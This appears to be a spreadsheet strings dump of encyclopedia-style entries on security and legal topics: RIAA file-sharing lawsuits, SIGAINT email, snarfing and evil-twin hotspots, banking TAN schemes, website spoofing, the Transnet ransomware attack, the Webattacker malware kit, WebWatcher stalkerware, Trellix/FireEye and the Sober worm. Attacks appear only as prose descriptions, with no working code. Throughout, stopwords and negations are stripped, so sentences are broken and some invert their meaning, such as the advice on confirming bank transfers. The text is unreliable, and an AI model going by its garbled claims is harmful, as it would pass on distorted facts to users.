lawsuit dismissed years later, children sued. default judgment entered daughter michelle $30,750 failing respond lawsuit, subsequently vacated. counterclaims another defendant, tanya andersen, 41-year-old single mother living oregon, filed counterclaims riaa including rico charge. riaa requested deposition 10-year-old daughter. subsequently, july 2007, riaa dropped case, leaving open question attorneys fees riaa's liability andersen's counterclaims. thereafter, andersen sued riaa, record company plaintiffs, safenet (mediasentry), settlement support center llc, huge list accusations including fraud negligent misrepresentation, violations orico, abuse legal process malicious prosecution subsequently amending complaint turn case class action.in texas, july 2007, rhonda crain (sony crain) sought leave counterclaim riaa knowingly engaging "one overt acts unlawful private investigation" riaa case crain.in file-sharing case, riaa referred defendants cartel acting collusively violation antitrust laws public policy, tying copyrights other, collusively litigating settling cases together, entering unlawful agreement among prosecute dispose cases accordance uniform agreement, common lawyers, thus overreaching bounds scope whatever copyrights might have". arista limewire well alleged defendants referred defendants counterclaim. see, e.g. lindor, riaa moved "strike" accusations. motion strike charges pending, scheduled taken consideration court october 2007. also arista limewire detailed overview. february 2008 alleged group artist managers lawyers riaa withholding settlements artists several years. riaa gained money lawsuits claiming defend rights artists, although none artists whose music 'illegally' downloaded reportedly received settlement money.in september 2008, charles nesson filed counterclaim behalf joel tenenbaum abuse process, claiming "ulterior purposes" intimidation users. determination damages copyright law, $750 $30,000 damages sought copyright infringement. riaa typically seeks $750 song file statutory damages.in lindor, defendant argued riaa's damage theory unconstitutional sought 1071 times actual cost track online stores ($.70). after brooklyn federal court judge upheld legal theory behind riaa's assessment damages november 2006, dropped lawsuit. 2008, federal judge xavier rodriguez ruled teenager whitney harper would $200 damages song shared kazaa network, instead $750 song riaa seeking. since kazaa expressly inform harper actions illegal, rodriguez determined unknowingly committed copyright infringement.in capitol thomas, minnesota mother ordered $222,000 ($9,250 song) damages riaa illegally sharing songs kazaa. before first sued, riaa offered settlement $5,000, thomas refused. later refused second settlement $25,000, would donated music industry persons need. after three trials multiple appeals, point statutory damages awarded $1,920,000, supreme court refused hear thomas's case march 2013. thomas maintains impossible riaa collect $222,000 inability pay. awarding costs prevailing parties 2006, electronic frontier foundation, american civil liberties union, public citizen, aclu oklahoma foundation, american association libraries submitted amicus curiae brief support motion attorneys fees made deborah foster capitol records debbie foster, federal court oklahoma, requesting attorney's fees awarded defendant alleging pattern inadequate investigation abusive legal practices riaa. riaa asked court accept amicus curiae brief, claiming "movants attempt paint false picture plaintiffs recording industry amok". february 2007, attorney's motion granted. july 2007, court ordered riaa foster $68,685.23 attorneys fees.in oklahoma case, capitol records deborah foster, riaa forced dismiss case woman filed motion leave make motion summary judgment attorneys fees, stating nothing file sharing nexus case paid internet access. judge ruled riaa's withdrawal case—after half years litigation—did immunize possible liability attorneys fees, holding defendant "prevailing party" copyright act. court subsequently ruled defendant entitled reimbursed reasonable attorneys fees, since riaa's pursuit case was, best, "marginal", pursued extract settlement someone clearly known direct infringer. court noted mere fact foster person paid internet access account basis copyright infringement lawsuit her. foster's motion attorneys fees supported amicus curiae brief american civil liberties union, public citizen, electronic frontier foundation, american association libraries, aclu foundation oklahoma. other instances riaa known forced back case avoid loss, priority records brittany chan michigan, virgin records tammie marson california, elektra wilke illinois. mass lawsuits hilary rosen riaa's president chief executive officer 1998 2003 leadership, company commenced legal campaign reduce illegal file-sharing. rosen expressed "concern lawsuits outlived usefulness" music devices work better together."in december 2008 wall street journal reported riaa dropped program mass lawsuits favor cooperative enforcement agreements number isps. riaa still reserves right file lawsuits 'particularly flagrant' offenders, article predicted lawsuits would "slow trickle."the riaa stated website intention lawsuit program bring awareness illegality file-sharing. although evidence lawsuit program reduced amount files offered large file-sharers, source stated 2006 limited effect offer less 1000 files. overall, lawsuits negligible effect availability files random time. public relations campaigns trade groups conducted various public relations campaigns targeting consumer file sharing: mpaa's "respect copyrights" campaigns, including "who makes movies?" "you click, can't hide" sub-campaigns. riaa's "soundbyting" campaign. access copyright's "captain copyright" campaign canada. business software alliance's "define line" campaign. federation against software theft's "piracy theft" campaign criticism there much criticism riaa's policy method suing individuals copyright infringement, notably internet-based advocacy groups electronic frontier foundation students free culture. date, riaa sued 20,000 people united states suspected distributing copyrighted works settled approximately 2,500 cases. brad templeton electronic frontier foundation called types lawsuits spamigation implied done merely intimidate people.the riaa criticized media subpoenaed gertrude walton, 83-year-old woman died december 2004. walton accused swapping rock, songs. riaa spokesman jonathan lamy commented legal proceedings commenced walton died. "our evidence gathering subsequent legal actions initiated weeks even months ago." brooklyn case, elektra schwartz, raej schwartz, queens woman multiple sclerosis, riaa's lawyers wrote judge possession letter "...america online, inc., confirmed defendant owner internet access account hundreds plaintiffs' sound recordings downloaded distributed public without plaintiffs' consent." after defense received copy letter, turned letter merely identified schwartz owner internet access account said nothing "downloading" "distributing".the riaa also criticized bringing lawsuits children, including 12-year-old brianna lahara york city 2003 13-year-old brittany chan michigan. under threat possible defendant's motion summary judgment attorneys fees, riaa withdrew case priority records chan. lahara's mother agreed $2,000 settlements. riaa's recent targeting students generated controversy well. april 2006 story campus newspaper tech indicates riaa representative stated cassi hunt, alleged file-sharer, previously, "the riaa known suggest students drop college community college order able afford settlements."the riaa also filed lawsuit woman never bought, turned used personal computer using "online distribution system" obtain unlicensed music files. this occurred walls case; understand this", said james walls, "how even computer?" riaa filed lawsuit larry scantlebury, died. they offered deceased man's family period sixty days grieve death began depose members scantlebury's family suit estate.an academic study depoorter (2011) among american european college students found users file-sharing technologies relatively anti-copyright copyright enforcement efforts generated backlash, hardening pro-file sharing beliefs among users technologies. also references</t>
  </si>
  <si>
    <t>SIGAINT</t>
  </si>
  <si>
    <t>sigaint hidden service offering secure email services. according page, interface used squirrelmail rely javascript. passwords recovered. users received addresses inbox: sigaint.org receiving clearnet emails .onion address receiving emails sent tor-enabled email services. free accounts storage space expired year inactivity. upgraded accounts access pop3, imap, smtp, larger size limits, full disk encryption, never expired. service recommended various security specialists highly secure email service.in april 2015, number user accounts compromised speculated time government-sponsored de-anonymization attack different exit nodes. sigaint administrator said hidden service hacked malicious exit nodes modified clearnet page link hidden service pointed imposter hidden service, effectively tricking users phishing attack harvested login credentials. sigaint since added gateway protect attacks.the service currently down. both ".org" website onion link return error code 500. also comparison webmail providers references</t>
  </si>
  <si>
    <t>Snarfing</t>
  </si>
  <si>
    <t>snarf term used computer programmers unix community meaning copy file data network, purpose, additional specialist meanings access data without appropriate permission. also refers using command line tools transfer files http, gopher, finger, protocols without user interaction, method achieving cache coherence multiprocessing computer architecture observation writes cached data. example example snarf evil twin attack, using simple shell script running software like airsnarf create wireless hotspot complete captive portal. wireless clients associate snarf access point receive dns, gateway appear completely normal. users queries resolve attacker's number, regardless settings, website attempt visit bring snarf "splash page", requesting username password. username password entered unsuspecting users mailed root@localhost. reason works legitimate access points impersonated and/or drowned rogue access points, users without means validate authenticity access points nevertheless give hotspot credentials asked also bluejacking bluesnarfing slurping references external links airsnarf attack wiktionary "snarf"</t>
  </si>
  <si>
    <t>Transaction authentication number</t>
  </si>
  <si>
    <t>transaction authentication number (tan) used online banking services form single one-time passwords (otps) authorize financial transactions. tans second layer security beyond traditional single-password authentication. tans provide additional security form two-factor authentication (2fa). physical document token containing tans stolen, useless without password. conversely, login data obtained, transactions performed without valid tan. classic tans often function follows: bank creates unique tans user. typically, tans printed list, enough last half year normal user; eight characters long. user picks list nearest bank branch (presenting passport, card similar document) sent list mail. password (pin) mailed separately. account, user must enter user name (often account number) password (pin). this give access account information ability process transactions disabled. perform transaction, user enters request authorizes transaction entering unused tan. bank verifies submitted list tans issued user. match, transaction processed. match, transaction rejected. used recognized transactions. list compromised, user cancel notifying bank.however, used transaction, tans still prone phishing attacks victim tricked providing password/pin several tans. further, provide protection man-in-the-middle attacks (where attacker intercepts transmission tan, uses forged transaction). especially client system becomes compromised form malware enables malicious user, possibility unauthorized transaction high. although remaining tans uncompromised used safely, users generally advised take appropriate action, soon possible. indexed (itan) indexed tans reduce risk phishing. authorize transaction, user asked arbitrary list enter specific identified sequence number (index). index randomly chosen bank, arbitrary acquired attacker usually worthless. however, itans still susceptible man-in-the-middle attacks, including phishing attacks attacker tricks user logging forged copy bank's website man-in-the-browser attacks allow attacker secretly swap transaction details background well conceal actual transactions carried attacker online account overview.therefore, 2012 european union agency network information security advised banks consider systems users infected malware default security processes user cross-check transaction data manipulations like example (provided security mobile phone holds mtan smartcard readers screen including transaction data generation process displaying beforehand user (chiptan). indexed captcha (itanplus) prior entering itan, user presented captcha, background also shows transaction data data deemed unknown potential attacker, user's birthdate. this intended make hard (but impossible) attacker forge captcha. this variant itan method used german banks adds captcha reduce risk man-in-the-middle attacks. some chinese banks also deployed method similar itanplus. recent study shows captcha-based schemes secure advanced automated attacks. mobile (mtan) mtans used banks austria, bulgaria, czech republic, germany, hungary, netherlands, poland, russia, singapore, south africa, spain, switzerland zealand, australia ukraine. when user initiates transaction, generated bank sent user's mobile phone sms. also include transaction data, allowing user verify transaction modified transmission bank. however, security scheme depends security mobile phone system. south africa, sms-delivered codes common, attack appeared: swap fraud. common attack vector attacker impersonate victim, obtain replacement card victim's phone mobile network operator. victim's user name password obtained means (such keylogging phishing). in-between obtaining cloned/replacement victim noticing phone longer works, attacker transfer/extract victim's funds accounts. 2016 study conducted swap fraud social engineer, revealing weaknesses issuing porting numbers. 2014, weakness signalling system used transmission published, allows interception messages. demonstrated tobias engel 31st chaos communication congress. beginning 2017, weakness used successfully germany intercept fraudulently redirect fund transfers.also rise smartphones malware attacks trying simultaneously infect mobile phone well break mtan scheme. pushtan pushtan app-based scheme german sparkassen banking group reducing shortcomings mtan scheme. eliminates cost messages susceptible card fraud, since messages sent special text-messaging application user's smartphone using encrypted internet connection. just like mtan, scheme allows user cross-check transaction details hidden manipulations carried trojans user's including actual transaction details bank received pushtan message. although analogous using mtan smartphone, risk parallel malware infection smartphone. reduce risk pushtan ceases function mobile device rooted jailbroken. late 2014 deutsche kreditbank (dkb) also adopted pushtan scheme. generators simple generators risk compromising whole list reduced using security tokens generate tans on-the-fly, based secret known bank stored token smartcard inserted token. however, generated tied details specific transaction. because valid transaction submitted protect phishing attacks directly used attacker, man-in-the-middle attacks. chiptan sm@rt-tan cardtan chiptan scheme used many german austrian banks. known chiptan sm@rt-tan germany cardtan austria, whereas cardtan technically independent standard.a chiptan generator tied particular account; instead, user must insert bank card use. generated specific bank card well current transaction details. there variants: older variant, transaction details least amount account number) must entered manually. modern variant, user enters transaction online, generator reads transaction details flickering barcode computer screen (using photodetectors). shows transaction details screen user confirmation generating tan. independent hardware, coupled simple communication channel, generator susceptible attack user's computer. even computer subverted trojan, man-in-the-middle attack occurs, generated valid transaction confirmed user screen generator, therefore modifying transaction retroactively would cause invalid. additional advantage scheme generator generic, requiring card inserted, used multiple accounts across different banks, losing generator security risk security-critical data stored bank card. while offers protection technical manipulation, chiptan scheme still vulnerable social engineering. attackers tried persuade users authorize transfer pretext, example claiming bank required "test transfer" company falsely transferred money user's account "send back". users therefore never confirm bank transfers initiated themselves. chiptan also used secure batch transfers (sammelüberweisungen). however, method offers significantly less security individual transfers. case batch transfer generator show number total amount transfers combined thus batch transfers little protection manipulation trojan. this vulnerability reported redteam pentesting november 2009. response, mitigation, banks changed batch transfer handling batch transfers containing single record treated individual transfers. also one-time password security token references</t>
  </si>
  <si>
    <t>Website spoofing</t>
  </si>
  <si>
    <t>website spoofing creating website, hoax, intention misleading readers website created different person organization. normally, spoof website adopt design target website, sometimes similar url. sophisticated attack results attacker creating "shadow copy" world wide victim's traffic attacker's machine, causing attacker obtain victim's sensitive information.another technique 'cloaked' url. using domain forwarding, inserting control characters, appear genuine concealing actual address malicious website. punycode also used purpose. punycode-based attacks exploit similar characters different writing systems common fonts. example, large font, greek letter similar appearance latin undercase letter however, greek letter represented punycode 5xa, latin undercase letter simply represented since present ascii system. 2017, security researcher managed register domain xn--80ak6aa92e.com show several mainstream browsers apple.com. while characters used belong latin script, default font browsers, result non-latin characters indistinguishable latin script.the objective fraudulent, often associated phishing e-mail spoofing, criticize make person body whose website spoofed site purports represent. because purpose often malicious, "spoof" expression whose base meaning innocent parody) poor term activity accountable organisations government departments banks tend avoid preferring explicit descriptors "fraudulent" "phishing".as example technique parody organisation, november 2006 spoof websites, www.msfirefox.com www.msfirefox.net, produced claiming microsoft bought firefox released "microsoft firefox 2007." prevention tools anti-phishing software spoofed websites predominate efforts developing anti-phishing software though concerns effectiveness. majority efforts focused market leaving mobile devices lacking table user studies current tools market. filtering layer botnets control drones. 2006, opendns began offering free service prevent users entering website spoofing sites. essentially, opendns gathered large database various anti-phishing anti-botnet organizations well data compile list known website spoofing offenders. when user attempts access websites, blocked level. apwg statistics show phishing attacks urls, domain names, would large amount website spoofing opendns would unable track. time release, opendns unable prevent unnamed phishing exploits yahoo, google etc. also email spoofing creating email spam phishing messages forged sender identity address fake news website website deliberately publishes hoaxes disinformation login spoofing techniques used steal user's password phishing attempt trick person revealing information spoofing attack cyber attack person program successfully masquerades another falsifying data referer spoofing practice http networking intentionally sending incorrect referer information references</t>
  </si>
  <si>
    <t>Transnet ransomware attack</t>
  </si>
  <si>
    <t>july 2021, transnet became victim ransomware attack. attack caused transnet declare force majeure several container terminals, including port durban, ngqura, port elizabeth cape town. attack first time "operational integrity country's critical maritime infrastructure suffered severe disruption" leading institute security studies (iss) call impact "unprecedented" south african history.the speculated transnet withholding details attack issue national security attack might cause legal liabilities company. bloomberg news stated attackers encrypted files transnet's computer systems thereby preventing company accessing information whilst leaving instructions start ransom negotiations. bloomberg article quotes source cybersecurity firm crowdstrike holdings inc. states ransomware used attack linked "strains known variously “death kitty,” “hello kitty” “five hands.”" likely originated russia eastern europe. department public enterprises stated none transnet client's data compromised attack.the timing attack, followed closely 2021 south african unrest following former south african president jacob zuma's imprisonment, caused speculation events might part coordinated effort disrupt economic activity country. authorities stated events likely unrelated. background durban port handles south african container traffic. timeline july transnet ransomware attack occurred. july computer systems restored. july transnet's investigation attack's severity still ongoing. july department public enterprises stated transnet fully restored operations ports. references</t>
  </si>
  <si>
    <t>System Reconfiguration Attacks</t>
  </si>
  <si>
    <t>system reconfiguration attacks modify settings user’s malicious purposes. example: urls favorites file might modified direct users look-alike websites: e.g., bank website changed “bankofabc.com”to “bancofabc.com”.</t>
  </si>
  <si>
    <t>Webattacker</t>
  </si>
  <si>
    <t>webattacker do-it-yourself malware creation includes scripts simplify task infecting computers spam-sending techniques lure victims specially rigged websites. allegedly created group russian programmers. demands minimal technical sophistication manipulated used crackers. sophos reported webattacker sold hacker sites network individual resellers includes technical support. malware code currently delivered least seven exploits, including threats aimed microsoft's mdac software, mozilla's firefox browser microsystems's java virtual machine programs. exploitation process usually consists following steps: establishment malicious website though automated tools provided webattacker sending mass email (otherwise known spam) inviting recipient visit website various pretenses infecting visitor's computer trojan exploiting numerous vulnerabilities using trojan arbitrary executables infected typically designed extract passwords, personal information, keystroke logging, taking general control compromised computerthe software appears updated regularly exploit flaws, flaw discovered september 2006 internet explorer handles certain graphics files. notes</t>
  </si>
  <si>
    <t>Webalizer</t>
  </si>
  <si>
    <t>webalizer analysis software, generates pages analysis, access usage logs. commonly used server administration tools. initiated bradford barrett 1997. statistics commonly reported webalizer include hits, visits, referrers, visitors' countries, amount data downloaded. these statistics viewed graphically presented different time frames, day, hour, month. overview website traffic analysis produced grouping aggregating various data items captured server form files website visitor browsing website. webalizer analyzes server files, extracting items client's addresses, paths, processing times, user agents, referrers, etc. grouping order produce html reports. servers http traffic using different file formats. common file formats common format (clf), apache custom format, extended file format. example line shown below. 192.168.1.20 [26/dec/2006:03:09:16 -0500] "get http/ 1.1" 1774 apache custom format customized http parameters, including request processing time size request itself. format custom controlled format line. typical apache format configuration shown below. microsoft's internet information services (iis) server logs http traffic extended file format. similarly apache custom format, logs configured capture extended parameters request processing time. extended logs recognized presence format lines, shown below. #fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(user-agent) cs(referer) sc-status sc-bytes cs-bytes time-taken webalizer process clf, apache extended files, well http proxy files produced squid servers. other file formats usually converted order analyzed. addition, logs compressed either gzip (.gz) bzip2 (.bz2) processed directly without need uncompress use. command line webalizer command line application launched operating system shell prompt. typical command shown below. webalizer en.wikipedia.org reports logfiles/access_log this command instructs webalizer analyze file access_log, incremental mode (-p), interpret file (-f), domain name en.wikipedia.org report links (-n) produce output subdirectory current directory. option complete list command line options. configuration besides command line options, webalizer configured parameters configuration file. default, webalizer reads file webalizer.conf interprets line processing instruction. alternatively, user-specified file provided using option. example, webmaster would like ignore requests made particular group hosts, ignoresite parameter discard records address matching specified pattern: ignoresite 192.168.0.* there hundred available configuration parameters, make webalizer highly configurable traffic analysis application. complete list configuration parameters please refer readme file shipped every source binary distribution. reports default, webalizer produces kinds reports yearly summary report detailed monthly report, analyzed month. yearly summary report provides information number hits, file page requests, hosts visits, well daily averages counters month. report accompanied yearly summary graph. each monthly reports generated single html page containing monthly summary report (listing overall number hits, file page requests, visits, hosts, etc.), daily report (grouping counters days month), aggregated hourly report (grouping counters hour together), report (grouping collected information url), host report address), website entry exit reports (showing common first last visit urls), referrer report (grouping referring third-party urls leading analyzed website), search string report (grouping items search terms used search engines google), user agent report (grouping browser type) country report (grouping host's country origin). each standard html reports described lists entries item (e.g. urls). actual number lines reports controlled configuration. webalizer also configured produce separate report items, list every single item, website visitors, requested urls, etc. addition html reports, webalizer configured produce comma-delimited dump files, list report data plain-text file. dump files imported spreadsheet applications databases analysis. internationalization html reports produced reports languages, including catalan, croatian, czech, danish, dutch, english, estonian, finnish, french, galician, german, greek, hungarian, icelandic, indonesian, italian, japanese, korean, latvian, malay, norwegian, polish, portuguese, portuguese (brazil), romanian, russian, serbian, simplified chinese, slovak, slovene, spanish, swedish, turkish, ukrainian. generate reports alternate language requires separate webalizer binary compiled specifically language. criticism generated statistics differentiate human visitors robots. result, reported metrics higher people alone. many webmasters claim webalizer produces highly unrealistic figures visits, sometimes 900% higher data produced javascript based statistics google analytics statcounter. reported hits high download managers segmented downloads; "partial content" reported hit. query string analysis. dynamically generated websites listed separately (e.g. pages arguments). also list analytics software external links official website</t>
  </si>
  <si>
    <t>WebWatcher</t>
  </si>
  <si>
    <t>webwatcher proprietary computer mobile device monitoring software developed awareness technologies. webwatcher compatible ios, android, windows, chrome macos operating systems. webwatcher mobile records text messages, call logs, history, photos, gps. webwatcher features include email instant message monitoring, keystroke logging, content filtering monitoring, screenshot monitoring. critics referred webwatcher similar pieces software "stalkerware". history webwatcher developed 2002 initially uses counter-terrorism windows pcs. software used predominantly parents monitor children's online activities employers monitor activities workers. 2010, version software released blackberry android devices. 2012, webwatcher released. webwatcher released 2014. reception criticism webwatcher received magazine editors' choice award 2011 review parental control monitoring software. article, webwatcher referred "heavy-handed" saying: find necessary track child who's engaging risky activities, webwatcher record every detail even send instant notification encounters certain words." also, about.com readers named webwatcher "best internet safety tool" part 2011 readers' choice awards.critics noted since software runs stealth device, opportunity software installed illegally. 2020, techcrunch media outlets described webwatcher "stalkerware". shortly thereafter, google removed advertisements webwatcher search results. references</t>
  </si>
  <si>
    <t>System Infected: Backdoor VBS Dunihi</t>
  </si>
  <si>
    <t>system infected: backdoor dunihi malicious "worm" computer virus infect computer, creating backdoor others steal information. backdoor trojans allow remote attackers perform various malicious activities compromised machine. references</t>
  </si>
  <si>
    <t>Trellix</t>
  </si>
  <si>
    <t>trellix (formerly fireeye mcafee enterprise) privately held cybersecurity company founded 2022. involved detection prevention major cyber attacks. provides hardware, software, services investigate cybersecurity attacks, protect malicious software, analyze security risks.in march 2021, announced acquisition mcafee enterprise all-cash transaction $4.0 billion. completed acquisition mcafee’s enterprise business july 2021 plans re-branding. june 2021, fireeye sold name products business symphony technology group (stg) $1.2 billion. combined fireeye acquisition mcafee's enterprise business launch trellix, extended detection response (xdr) company. meanwhile, mcafee enterprise's security service edge (sse) business would operate separate company known skyhigh security. history fireeye founded 2004 ashar aziz, former microsystems engineer. fireeye's first commercial product developed sold 2010. that year, fireeye expanded middle east. this followed opening offices asia pacific 2010, europe 2011 africa 2013.initially, fireeye focused developing virtual machines download test internet traffic transferring corporate government network. company diversified time, part acquisitions. 2014, acquired mandiant, provides incident response services following identification security breach. fireeye went public 2013, remained 2021. usatoday says fireeye "has called investigate high-profile attacks target, morgan chase, sony pictures, anthem, others".in december 2012, founder aziz stepped former mcafee david dewalt appointed position. dewalt recruited order prepare company initial public offering (ipo). following year, fireeye raised additional million venture capital, bringing total funding million. late 2013, fireeye went public, raising $300 million.at time, fireeye growing rapidly. employees 2011, grew june 2013. revenues multiplied eight-fold 2010 2012. however, fireeye profitable, high operating costs research development expenses.in december 2013, fireeye acquired mandiant billion. mandiant private company founded 2004 kevin mandia provided incident response services event data security breach. mandiant known investigating high-profile hacking groups. before acquisition, fireeye would often identify security breach, partner mandiant investigate hackers were. mandiant became subsidiary fireeye.in late 2014, fireeye initiated secondary offering, selling another $1.1 billion shares, order fund development wider range products. shortly afterward, fireeye acquired another data breach investigation company, npulse, approximately million. 2015, fireeye making $100 million annual revenue, still unprofitable, largely research development spending.in january 2016, fireeye acquired isight partners $275 million. isight threat intelligence company gathered information hacker groups cybersecurity risks. this followed acquisition invotas, security automation company. dewalt stepped 2016 replaced mandiant former fireeye president kevin mandia. afterwards, downsizing restructuring response lower-than-expected sales, resulting layoff 300-400 employees. profit revenue increased account shifts subscription model lower costs.in march 2021, symphony technology group (stg) acquired mcafee enterprise billion. june 2021, fireeye announced sale products business name $1.2 billion. sale split cyber forensics unit, mandiant, fireeye stock symbol feye relaunched mndt nasdaq october 2021. january 2022, announced launch trellix, extended detection response company, combination fireeye mcafee enterprise business. september 2021, announced bryan palma combined company. products services fireeye started "sandboxing" company. sandboxing incoming network traffic opened within virtual machine test malicious software, introduced network. fireeye's products diversified time, part acquisitions. 2017, fireeye transitioned primarily selling appliances, software-as-a-service model.fireeye sells technology products including network, email, endpoint security, platform managing security operations centers called helix, consulting services primarily based incident response, threat intelligence products.the central management system (cms) consolidates management, reporting, data sharing (malware protection system), email mps, file mps, malware analysis system (mas) single network-based appliance acting distribution malware security intelligence.the fireeye cloud crowd-sources dynamic threat intelligence (dti) detected individual fireeye appliances, automatically distributes time sensitive zero-day intelligence globally subscribed customers frequent updates. content updates include combination fireeye labs generated intelligence identified research efforts. inception january 2022, trellix 40,000 customers, 5,000 employees, billion annual revenue. trellix includes endpoint, cloud, collaboration, data user, application, infrastructure security capabilities fireeye mcafee. business focuses threat detection response using machine learning automation, security technology capability learn adapt order combat advanced threats. operations fireeye known uncovering high-profile hacking groups. 2008-2014 october/november 2009, fireeye participated effort take mega-d botnet (also known ozdok). march 2011, rustock botnet taken action microsoft, federal enforcement agents, fireeye, university washington. july 2012, fireeye involved analysis grum botnet's command control servers located netherlands, panama, russia.in 2013, mandiant (before acquired fireeye) uncovered multi-year espionage effort chinese hacking group called apt1.in 2014, fireeye labs team identified zero-day vulnerabilities cve-2014-4148 cve-2014-4113 part limited, targeted attacks major corporations. both zero-days exploit windows kernel. microsoft addressed vulnerabilities october 2014 security bulletin. also 2014, fireeye provided information threat group calls fin4. fin4 appears conduct intrusions focused single objective: obtaining access insider information capable making breaking stock prices public companies. group targeted hundreds companies, specifically targets emails c-level executives, legal counsel, regulatory, risk, compliance personnel, individuals would regularly discuss confidential, market-moving information. also 2014, fireeye released report focused threat group refers apt28. apt28 focuses collecting intelligence would useful government. fireeye found since least 2007, apt28 targeting privileged information related governments, militaries, security organizations would likely benefit russian government. 2015 2015, fireeye confirmed existence least router implants spread across four different countries: ukraine, philippines, mexico, india. referred synful knock, implant stealthy modification router’s firmware image used maintain persistence within victim’s network.in september 2015, fireeye obtained injunction security researcher attempting report vulnerabilities fireeye malware protection system.in 2015, fireeye uncovered attack exploiting previously unknown vulnerabilities, microsoft office (cve-2015-2545) another windows (cve-2015-2546). attackers exploit within microsoft word document (.docx) appeared résumé. combination exploits grant fully privileged remote code execution. both vulnerabilities patched microsoft.in 2015, fireeye service team singapore uncovered phishing campaign exploiting adobe flash player zero-day vulnerability (cve-2015-3113). adobe released patch vulnerability out-of-band security bulletin. fireeye attributed activity china-based threat group tracks apt3. 2016 2016, fireeye announced tracking pair cybercriminals referred “vendetta brothers.” company said enterprising uses various strategies compromise point-of-sale systems, steal payment card information sell underground marketplace “vendetta world.” mid-2016, fireeye released report impact 2015 agreement former u.s. president barack obama china's paramount leader jinping neither government would “conduct knowingly support cyber-enabled theft intellectual property” economic advantage. security firm reviewed activity groups suspects operating china otherwise support chinese state interests determined that, mid-2014, overall decrease successful network compromises china-based groups organizations u.s. countries.in 2016, fireeye announced identified several versions ics-focused malware dubbed irongate crafted manipulate specific industrial process running within simulated siemens control system environment. although siemens product computer emergency readiness team (productcert) confirmed fireeye irongate viable operational siemens control systems irongate exploit vulnerabilities siemens products, security firm said irongate invokes attack concepts first seen stuxnet.on 2016, fireeye detected attack exploiting previously unknown vulnerability adobe flash player (cve-2016-4117). security firm reported issue adobe product security incident response team (psirt) adobe released patch vulnerability four days later.in 2016, fireeye discovered widespread vulnerability affecting android devices permits local privilege escalation built-in user “radio”, making attacker potentially perform activities viewing victim’s database phone history. fireeye reached qualcomm january 2016 subsequently worked qualcomm product security team address issue.in 2016, fireeye provided details fin6, cyber criminal group steals payment card data monetization targets predominately hospitality retail sectors. group observed aggressively targeting compromising point-of-sale (pos) systems, making millions payment card numbers later sold underground marketplace. 2017-2019 2017, fireeye detected malicious microsoft office documents leveraging previously undisclosed vulnerability, cve-2017-0199. this vulnerability allows malicious actor download execute visual basic script containing powershell commands user opens document containing embedded exploit. fireeye shared details vulnerability microsoft coordinated public disclosure timed release patch microsoft address vulnerability.in 2018, fireeye helped facebook identify fake accounts. 2020-2021 fireeye revealed tuesday, december 2020 systems pierced called nation top-tier offensive capabilities". company said attackers used "novel techniques" steal copies fireeye's team tool kit, attackers could potentially attacks. day, fireeye published countermeasures tools stolen.a week later december 2020, fireeye reported solarwinds supply chain attack u.s. national security agency (nsa), federal agency responsible defending u.s. cyberattacks, said tools stolen actors. known aware attack notified fireeye. uses solarwinds software itself.within week fireeye's breach, cyber-security firm mcafee said stolen tools used least countries, including ireland, netherlands, australia.during continued investigation hack data federal agencies revealed december 2020, fireeye reported early january hacks originated inside usa, sometimes close facilities affected, enabled hackers evade surveillance national security agency defenses used department homeland security. 2022 2022 report trellix noted hacking groups wicked panda (linked china) cozy bear (linked russia) behind state-sponsored hacking campaigns third quarter 2021, third state-sponsored cyber attacks, hackers abused cobalt strike security tools access victim's network. january 2022 report news, trellix bryan palma stated increasing level cyberwarfare threats russia china.a 2022 trellix report stated hackers using microsoft onedrive espionage campaign government officials western asia. malware, named trellix graphite, employs microsoft graph onedrive command control server execute malware. attack split multiple stages order remain hidden long possible. acquisitions references external links media related fireeye wikimedia commons official website</t>
  </si>
  <si>
    <t>Sober (computer worm)</t>
  </si>
  <si>
    <t>sober worm family computer worms discovered october 2003. like many worms, sober sends e-mail attachment, fake webpages, fake pop-up ads, fake advertisements. sober worms must unpacked user. upon execution, sober copies several files windows directory, depending variant. adds appropriate keys windows registry, along empty files windows directory. these empty files used deactivate previous sober variants. sober written visual basic runs microsoft windows platform. known variants sober.l sober.t sober.x sober.y sober.z aliases cme-681 worm_sober.ag w32/sober-{x-z} win32.sober.w win32.sober.o sober.y (not variant, another name sober.x, often used f-secure) s32/sober@mmim681 w32/sober.aa@mm affected platforms microsoft windows family windows windows windows windows windows 2000 windows windows server 2003 actions infection sober worms must unpacked user. upon execution, sober copies following files windows directory: antiv.exe csrss.exe driver.exe driverini.exe drv.exe explorer.exe filexe.exe hlp16.exe lssas.exe qname.exe services.exe smss.exe spoole.exe swchost.exe syshost.exe systemchk.exe systemini.exe winchk.exe winlog32.exe winreg.exeit adds appropriate keys windows registry ensure activation windows startup, along empty files windows directory. these empty files used deactivate previous sober variants. spread sober e-mail addresses user's e-mail address book. spreads e-mail using smtp engine. deactivation security software sober deactivate several popular antivirus software packages, well microsoft antispyware hijackthis. outbreaks october 2003 first discovery march 2005 sober.l november 2005 sober.t november 2005 sober.x november 2005 outbreak e-mails containing sober worm sent around internet disguised e-mail either federal bureau investigation central intelligence agency, organizations united states government. e-mail claimed recipient caught visiting illegal websites, asked user open attachment answer questions. once infected attachment opened variety system-damaging events occurred: anti-virus security measures disabled, well ability access websites assistance; furthermore, contacts user's address book sent identical e-mail. also suspected sober.x functions spyware stealing personal information infected user. messagelabs, computer security company, caught least three million copies within hours breakout, mcafee, another system security research firm, reported 70,000 cases virus consumer computers. similar e-mail circulated germany. claiming sent bundeskriminalamt, e-mail told readers caught downloading "pirated" software. sober.x included attachment. political motivations 2005, variant sober.q appeared. whereas previous variants appeared motivated commercial gain malicious intent, first seem politically motivated. other variants (such sober.b) sent e-mails subject headers also indicated political intent, seemed designed arouse victim's interest, would open e-mail's attachment. sober.q send e-mails attachments, instead preferring links sites viruses. sober.q spread computers send messages support far-right groups germany pending local elections state north rhine-westphalia. most appeared support directly german political party (nationalist party germany) links website, well forum entries. however, unknown whether virus originated themselves, supporters party, hacker group trying place blame party group attempting discredit party. similar incident, sober virus used 2005 unidentified german group send widespread distribution links various political articles commentaries. effort seemed linked german elections around time period. references external links "internet virus circulates disguised e-mail government." wikinews, november 2005. news article</t>
  </si>
  <si>
    <t>WebAuthn</t>
  </si>
  <si>
